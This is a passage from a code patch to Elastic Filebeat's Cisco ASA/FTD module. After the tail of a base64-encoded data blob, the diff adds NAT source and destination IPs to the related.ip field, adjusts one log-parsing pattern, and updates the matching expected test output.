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" } diff --git a/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json b/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json index d416dcb068c..ed414710ed2 100644 --- a/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json +++ b/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json @@ -442,6 +442,7 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.2.222", + "192.0.2.43", "10.123.1.35" ], "service.type": "cisco", @@ -543,7 +544,8 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.2.1", - "10.123.3.42" + "10.123.3.42", + "10.123.3.130" ], "service.type": "cisco", "source.address": "192.0.2.1", @@ -796,7 +798,8 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.0.17", - "192.168.3.42" + "192.168.3.42", + "10.0.0.130" ], "service.type": "cisco", "source.address": "192.0.0.17", @@ -3321,6 +3324,7 @@ ], "related.ip": [ "10.1.1.45", + "192.88.99.1", "192.88.99.129" ], "server.domain": "bad.example.com", @@ -3379,7 +3383,9 @@ "observer.vendor": "Cisco", "related.ip": [ "10.1.1.1", - "192.0.2.223" + "10.2.1.1", + "192.0.2.223", + "192.0.2.225" ], "service.type": "cisco", "source.address": "10.1.1.1", @@ -3436,6 +3442,7 @@ "observer.vendor": "Cisco", "related.ip": [ "10.1.1.1", + "10.2.1.1", "192.0.2.223" ], "service.type": "cisco", diff --git a/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml b/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml index 833a67bbd17..fc25f93f3b8 100644 --- a/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml +++ b/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml @@ -318,7 +318,7 @@ processors: - dissect: if: "ctx._temp_.cisco.message_id == '302022'" field: "message" - pattern: "Built %{} stub %{network.transport} connection for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" + pattern: "Built %{} stub %{network.transport} connection for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} %{} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} %{}" - dissect: if: "ctx._temp_.cisco.message_id == '302023'" field: "message" @@ -1614,11 +1614,21 @@ processors: value: "{{source.ip}}" if: "ctx?.source?.ip != null" allow_duplicates: false + - append: + field: related.ip + value: "{{source.nat.ip}}" + if: "ctx?.source?.nat?.ip != null" + allow_duplicates: false - append: field: related.ip value: "{{destination.ip}}" if: "ctx?.destination?.ip != null" allow_duplicates: false + - append: + field: related.ip + value: "{{destination.nat.ip}}" + if: "ctx?.destination?.nat?.ip != null" + allow_duplicates: false - append: field: related.user value: "{{user.name}}"